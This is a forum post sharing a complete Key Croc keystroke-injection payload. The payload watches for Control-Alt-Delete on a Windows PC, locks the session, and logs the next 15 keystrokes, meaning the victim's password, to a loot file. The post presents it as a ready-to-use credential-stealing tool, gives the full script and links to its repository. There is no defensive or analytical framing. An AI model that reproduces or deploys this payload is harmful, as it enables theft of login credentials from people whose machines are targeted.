Jump to content

[PAYLOAD] Windows Password Grabber CAD


RootJunky

Recommended Posts

Windows Password Grabber CAD

 

This is a simple payload used to logout ones control alt delete is pressed on a windows PC, then it will capture the next 15 buttons pressed.  You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. 

# Title:         Windows Password Grabber
# Description:   When Control Alt Delete is pressed it will long out the current user and request a password that will be captured and stored in loot. 
# Author:        RootJunky
# Version:       1.0
# Category:      Credentials 
#
#
MATCH \[CONTROL-ALT-DELETE\]
LED ATTACK STAGE1
QUACK STRING "GUI l" 
SAVEKEYS /root/loot/password.log NEXT 15
QUACK DELAY 1000
LED OFF

https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-password-grabber-ctrl-alt-delete.txt

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...